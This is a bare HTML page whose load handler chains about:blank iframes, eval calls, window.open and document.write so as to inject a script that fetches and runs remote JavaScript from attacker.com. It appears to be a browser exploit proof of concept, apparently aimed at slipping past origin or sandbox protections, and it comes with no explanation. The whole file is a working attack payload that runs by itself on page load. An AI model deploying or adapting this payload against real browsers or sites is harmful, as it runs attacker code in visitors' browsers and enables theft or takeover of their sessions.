<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGAXhlVGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGAXhlVGGGGG.onload=_=>GGGGGAXhlVGGGGG.contentWindow.eval("w=window.open('about:blank'); w.document.write('<iframe id=GGGAXhlVGGG src=about:blank><\/iframe><script>GGGAXhlVGGG.onload=_=>GGGAXhlVGGG.contentWindow.eval(\x22var o=document.createElement(`script`);o.src=`https://attacker.com/static/static.js`;document.body.appendChild(o);void(0);\x22);GGGAXhlVGGG.contentWindow.location.reload();<\/script>');");GGGGGAXhlVGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>